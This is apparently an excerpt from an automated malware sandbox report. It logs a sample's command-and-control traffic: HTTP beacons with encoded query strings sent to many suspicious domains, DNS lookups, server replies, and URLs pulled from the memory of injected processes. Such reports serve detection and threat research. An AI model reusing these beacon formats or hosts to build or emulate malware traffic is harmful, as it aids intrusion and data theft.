    GET /cs9k/?QhKxhNP=W7SiLeR8lVOS0IddzXWoYXDt6RHub9Z/llH5xMN7IPTa857c9EQRUjsfmtg32BbwdcsWIPqYG66ejHdS265gpP2tZDtQplym5WCIjSXUngUJeAz/nR33NA1XQvWBI8EpRg==&Yby=d2ydCtHpb8 HTTP/1.1
    Host: www.holytur.net
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-us
    Connection: close
    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30

Source: global traffic, HTTP traffic detected:
    GET /30le/?QhKxhNP=jHE7b6Z9ED1A0Je7bwo+kjGjstTykwGZjMkqHVfcjQ95lgOzDj3OOkgun9YTkzFADI0DOvoxgj3LN5jGlHy+CHSERWGJqvHJseYAxerz13ZcR6Qaw8dlP7tGoG6xZXENiQ==&Yby=d2ydCtHpb8 HTTP/1.1
    Host: www.nieuws-july202488.sbs
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-us
    Connection: close
    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30

Source: global traffic, HTTP traffic detected:
    GET /s15n/?QhKxhNP=JfQJqlQL4YuujxfZFicS9Y3zSvzh5uc29LPY+3nQdNuELRDWQb2uefNArAI9Jzm+wUv6iBr2b0gwhreB6wQHxTYP3MQRZc2DBo1D75Es8xJLJq3ZosxOeO3P23AwVQ3aXA==&Yby=d2ydCtHpb8 HTTP/1.1
    Host: www.losmason.shop
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-us
    Connection: close
    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30

Source: global traffic, HTTP traffic detected:
    GET /yf1h/?QhKxhNP=YVpI46H16R/w/kk1bY6rBRavyZUbsgJtp9CZM+Bxvkr6dioDBNQhLHAnFkN0G7WaNsS3kDmK0ayEpl6TGabHmNyPQwWjM0ybC5bIBemWzNbXvkTcX815xQrmtulGFojAfQ==&Yby=d2ydCtHpb8 HTTP/1.1
    Host: www.hayaniya.org
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-us
    Connection: close
    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30

Source: global traffic, HTTP traffic detected:
    GET /rxts/?Yby=d2ydCtHpb8&QhKxhNP=UMqd3Rr/GgjcpDtMifF0hAVXULwugGyaJHdfF0vXYxuoY8NmwcRKHFRQ3Zc522gmFWLmVhpOr5FlbfkrODlmL/pMmEFBmvtdQsTPBX/BeC8bc9YX4gHB5yTSGVyOHdtWew== HTTP/1.1
    Host: www.lovel.shop
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-us
    Connection: close
    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                    Source: global trafficHTTP traffic detected: GET /zs4o/?QhKxhNP=40yvXZqQXwyOFTl0d1fxwhQGTsZjKCC3JWjHJEZ8IBZutO+YSqvvwioh1RBVRKlMIRVxucUqEMWgr+FAgfZYoR4vWuFQr4uBZgu5x5JrNmZwlLDog/JQkd5M42bUbwrevw==&Yby=d2ydCtHpb8 HTTP/1.1Host: www.duskgazes.workAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                    Source: global trafficHTTP traffic detected: GET /xyvr/?Yby=d2ydCtHpb8&QhKxhNP=Dk/wQKBXq4hP/zVb9ApyZmDkyzbQqrM0hWgYI5VbiKGV4GeQY6os12Lf5EdpuHYA6f15h+K7XFjq1wIjorrCnH6ZrrhC9s12l00lNHx4+XmTSfuGU54Az/E2dcdiA+66+g== HTTP/1.1Host: www.zrinorem-srumimit.sbsAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                    Source: global trafficHTTP traffic detected: GET /dnjw/?QhKxhNP=LLuahgeFNd50MfmeR+YO4X7oQIpbAv675x2tVSlUIoVemPDFIi7IcWvJHwj84u5Zt+Ov/a/NakHy5HK7jRYViNkqfDz6ShsEoBWZb9ZpzTMPTjlue++bzVqPhWzfo/q89w==&Yby=d2ydCtHpb8 HTTP/1.1Host: www.6822662.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                    Source: global trafficHTTP traffic detected: GET /404o/?QhKxhNP=WKBQtURp4mxoG42HvJVFdxkBeoRQKLcKkncaZCQ6BKNKWWSe5DM6Y469mdl3/OFUlQwZCGrNWgxnPoxBbE5j38LAsK6uFZ8oMmHn4Vx5wOob/Qku77DXil1QxQESxukZTQ==&Yby=d2ydCtHpb8 HTTP/1.1Host: www.lingdianyun29.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                    Source: global trafficHTTP traffic detected: GET /d5up/?QhKxhNP=t4sGAbB2VavWqiiIadPUj68mTJ7Q54MapR6mUVHY3SwgNZVHyOwsTaauiAAffAhHdKJKrrjT+NERuNHfq0vx0hlOGr9kxI5wEfZ1g7ObOVlc/eoN6Msnk6zs6578MLwdAQ==&Yby=d2ydCtHpb8 HTTP/1.1Host: www.learnnow.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                    Source: global trafficHTTP traffic detected: GET /jcsf/?QhKxhNP=NJIOohqps9aNaGk8Gv0x95TXV1ke4jY2ru9PIld0z7+iuCSmXzhmM46cxc5xGqvTMH7YV8ukdWwIlgb06ERZu+HhQde6PspHhBqQKwPZwv/EXFgjFQrkOjXlWxa7+IRGPg==&Yby=d2ydCtHpb8 HTTP/1.1Host: www.carpentry.clubAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                    Source: global trafficHTTP traffic detected: GET /cfqm/?QhKxhNP=FHiNz6b6Wn9oKec3i10x/NxXWu4/t8kjzDy3bn44oOFoUWscXE4DzqYFgJdNnLXTrdZ+ESI+3Oq4E1BzotELfZv0FR4L9xniphkEx7BDvvGrYDhvMkPmWTEebCLVzsH5Qg==&Yby=d2ydCtHpb8 HTTP/1.1Host: www.030002449.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                    Source: global trafficHTTP traffic detected: GET /4ia5/?Yby=d2ydCtHpb8&QhKxhNP=oT6nzMsk5LGNbZnpqYupld8IqKtrWX3IcFzU22s19J/vOzFqssjWYMTSR1XNlBsCMk+VGX4Yc+V3gPgjU/YcbzdAUc79Tjp71o7bTfkvAIZVHxyoJSYvjU3Ey8bm4rBe7Q== HTTP/1.1Host: www.innovationpulse.techAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                    Source: global trafficDNS traffic detected: DNS query: www.holytur.net
                    Source: global trafficDNS traffic detected: DNS query: www.nieuws-july202488.sbs
                    Source: global trafficDNS traffic detected: DNS query: www.losmason.shop
                    Source: global trafficDNS traffic detected: DNS query: www.hayaniya.org
                    Source: global trafficDNS traffic detected: DNS query: www.lovel.shop
                    Source: global trafficDNS traffic detected: DNS query: www.duskgazes.work
                    Source: global trafficDNS traffic detected: DNS query: www.zrinorem-srumimit.sbs
                    Source: global trafficDNS traffic detected: DNS query: www.6822662.xyz
                    Source: global trafficDNS traffic detected: DNS query: www.lingdianyun29.xyz
                    Source: global trafficDNS traffic detected: DNS query: www.learnnow.info
                    Source: global trafficDNS traffic detected: DNS query: www.carpentry.club
                    Source: global trafficDNS traffic detected: DNS query: www.030002449.xyz
                    Source: global trafficDNS traffic detected: DNS query: www.innovationpulse.tech
                    Source: global trafficDNS traffic detected: DNS query: www.hasan.cloud
                    Source: unknownHTTP traffic detected: POST /30le/ HTTP/1.1Host: www.nieuws-july202488.sbsAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usAccept-Encoding: gzip, deflateConnection: closeContent-Length: 208Cache-Control: max-age=0Content-Type: application/x-www-form-urlencodedOrigin: http://www.nieuws-july202488.sbsReferer: http://www.nieuws-july202488.sbs/30le/User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 28 Nov 2024 08:13:51 GMTContent-Type: text/html; charset=UTF-8Content-Length: 146Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Thu, 28 Nov 2024 08:14:09 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: close
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Thu, 28 Nov 2024 08:14:12 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: close
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Thu, 28 Nov 2024 08:14:14 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: close
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkeddate: Thu, 28 Nov 2024 08:14:17 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: close
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 28 Nov 2024 08:14:39 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://hayaniya.org/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingContent-Encoding: gzipTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 28 Nov 2024 08:14:42 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://hayaniya.org/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingContent-Encoding: gzipTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 28 Nov 2024 08:14:44 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://hayaniya.org/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingContent-Encoding: gzipTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 28 Nov 2024 08:15:23 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Sat, 14 Sep 2024 06:51:15 GMTcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aiTvGJUOdRFKR9plj95L8vps6suq%2Fp71DOmgp%2FA0eaTabHxfo7A5e24OCP2PEuyhmzBa6qq3ir0jS9XCixpPdQTJDDNFlY2wfVrDXC4yvRrXjKtKF%2BEHreozL2%2B5HoTnthZw5a5I0%2BNGCRIk"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e98e8ebefebc439-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1456&min_rtt=1456&rtt_var=728&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=823&delivery_rate=0&cwnd=205&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Thu, 28 Nov 2024 08:15:26 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Last-Modified: Sat, 14 Sep 2024 06:51:15 GMT cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=59BQ5sQlMG%2F1MryFme4dyRB%2BCa6iuggC5IZ32I0NCZ3WUdQmqT9AWANf6fRMOLB%2FajHO7OddhU%2FXNEAmmj%2FzjQYHfTNdbqP5e6zIVLqhhidAyllh57%2BaqtwI3yDjHpEgGZehV18TeL1Wh%2BXJ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e98e8fc5ba95e7c-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1574&min_rtt=1574&rtt_var=787&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=843&delivery_rate=0&cwnd=181&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Thu, 28 Nov 2024 08:15:29 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Last-Modified: Sat, 14 Sep 2024 06:51:15 GMT cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QVMafmkQv6i9ejtgc1j4zSvMTgutuCa4M%2BNvQb%2BkeHq5LyGcJplKH8NFYGVrzM7Qk7qHnwC7kR43lGr1N%2BXwnA2aUQrIWO7Jx7mm%2FF8zi%2FBNvJ73UCmCKAfnpMnf8MXLT3FtLSGcNw%2BTDtRV"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e98e90d8a35180d-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1463&min_rtt=1463&rtt_var=731&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1860&delivery_rate=0&cwnd=199&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Thu, 28 Nov 2024 08:15:31 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Last-Modified: Sat, 14 Sep 2024 06:51:15 GMT cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uyxmWUU%2FHsSeGJc9Fk%2BD3Zqywqi1dEgTh0aOr1NA3vyoGXX03ccCMKODSNEnw6NwrqmwV5V%2BxleLJMCIMMMDhdFxXKEkQYDtoKZbh3ZgbB6jbUIFSHy4VH39Zovu51GMyT9SPIKjq7ctnEFk"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e98e91df89e1a24-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1993&min_rtt=1993&rtt_var=996&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=551&delivery_rate=0&cwnd=212&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Ascii: 59e<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>404 &mdash; Not Found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/> <meta name="description" content="Sorry, page not found"/> <style type="text/c
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Thu, 28 Nov 2024 08:16:10 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Thu, 28 Nov 2024 08:16:13 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Thu, 28 Nov 2024 08:16:16 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Thu, 28 Nov 2024 08:16:18 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html; charset=utf-8 Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Thu, 28 Nov 2024 08:16:43 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding ETag: W/"66cce1df-b96" Content-Encoding: gzip
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Thu, 28 Nov 2024 08:16:46 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding ETag: W/"66cce1df-b96" Content-Encoding: gzip
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Thu, 28 Nov 2024 08:16:49 GMT Content-Type: text/html; charset=utf-8 Content-Length: 2966 Connection: close Vary: Accept-Encoding ETag: "66cce1df-b96"
Source: systray.exe, 00000011.00000002.4500910385.00000000050B6000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003206000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404refer
Source: Documents.exe, uFEeKIucsX.exe.0.dr String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: Documents.exe, uFEeKIucsX.exe.0.dr String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
Source: systray.exe, 00000011.00000002.4500910385.00000000053DA000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.000000000352A000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://hayaniya.org/yf1h/?QhKxhNP=YVpI46H16R/w/kk1bY6rBRavyZUbsgJtp9CZM
Source: Documents.exe, uFEeKIucsX.exe.0.dr String found in binary or memory: http://ocsp.comodoca.com0
Source: Documents.exe, 00000000.00000002.2154688065.0000000003376000.00000004.00000800.00020000.00000000.sdmp, uFEeKIucsX.exe, 0000000A.00000002.2277213173.00000000028E6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.6822662.xyz/
Source: systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.6822662.xyz/Dating/047a40599547.html
Source: systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.6822662.xyz/Dating/067b299930.html
Source: systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.6822662.xyz/Dating/068e399928.html
Source: systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.6822662.xyz/Dating/069a299928.html
Source: systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.6822662.xyz/Dating/128c40599466.html
Source: systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.6822662.xyz/Dating/129d40599465.html
Source: systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.6822662.xyz/Dating/14a40599580.html
Source: systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.6822662.xyz/Dating/178b40599416.html
Source: systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.6822662.xyz/Dating/209d40599385.html
Source: systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.6822662.xyz/Dating/289d399707.html
Source: systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.6822662.xyz/Dating/444d40599150.html
Source: systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.6822662.xyz/Dating/449a40599145.html
Source: systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.6822662.xyz/Dating/468c40599126.html
Source: systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.6822662.xyz/Dating/565f40599029.html
Source: systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.6822662.xyz/Dating/736e40598858.html
Source: systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.6822662.xyz/Dating/776b40598818.html
Source: systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.6822662.xyz/Dating/830f499165.html
Source: systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.6822662.xyz/Dating/87c40599507.html
Source: systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.6822662.xyz/Dating/912f40598682.html
Source: systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.6822662.xyz/Dating/927a399069.html
Source: systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.6822662.xyz/baishimolinair/
